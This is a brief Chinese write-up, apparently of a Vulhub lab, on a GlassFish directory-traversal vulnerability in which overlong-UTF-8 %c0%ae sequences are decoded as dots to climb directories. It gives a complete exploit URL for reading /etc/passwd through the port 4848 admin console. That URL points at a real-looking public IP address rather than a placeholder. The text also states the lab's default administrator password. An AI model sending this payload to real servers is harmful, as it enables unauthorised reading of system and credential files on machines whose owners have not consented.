GlassFish 是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改
java语言中会把%c0%ae
解析为\uC0AE
,最后转义为ASCCII字符的.
(点)。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/
来向上跳转,达到目录穿越、任意文件读取的效果。
环境运行后,访问http://your-ip:8080
和http://your-ip:4848
即可查看web页面。其中,8080端口是网站内容,4848端口是GlassFish管理中心。
访问
https://188.40.189.134:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
即可看到/etc/passwd内容



本环境超级管理员密码在docker-compose.yml
中设置,默认为vulhub_default_password
,在4848端口利用该密码可以登录管理员账户。
大概就这些了......